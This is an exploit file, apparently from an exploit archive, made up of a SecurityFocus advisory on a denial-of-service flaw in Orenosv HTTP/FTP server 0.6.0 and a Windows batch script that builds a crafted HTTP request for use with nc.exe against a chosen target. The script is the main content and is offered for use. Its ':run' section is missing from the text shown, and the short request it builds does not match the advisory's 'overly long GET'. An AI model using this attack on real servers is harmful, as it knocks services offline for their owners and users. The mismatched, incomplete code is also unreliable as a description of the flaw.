31 lines
1 KiB
Batchfile
Executable file
31 lines
1 KiB
Batchfile
Executable file
source: http://www.securityfocus.com/bid/10420/info
|
|
|
|
Orenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding.
|
|
|
|
@echo on
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
:Application: Orenosv Server
|
|
:Vendors: http://home.comcast.net/~makataoka/orenosv060.zip
|
|
:Version: <=0.6.0
|
|
:Platforms: Windows
|
|
:Bug: D.O.S
|
|
:Date: 2004-06-02
|
|
:Author: CoolICE
|
|
:E-mail: CoolICE#China.com
|
|
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof
|
|
;set PORT=9999
|
|
;if not '%2'=='' set PORT=%2
|
|
;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe
|
|
echo Need nc.exe&&goto :eof
|
|
;DEBUG < %~s0
|
|
;GOTO :run
|
|
|
|
e 100 "GET / HTTP/1.0" 0D 0A
|
|
e 110 "Transfer-Encoding: Boy" 0D 0A 0D 0A
|
|
rcx
|
|
2A
|
|
nhttp.tmp
|
|
w
|
|
q
|
|
|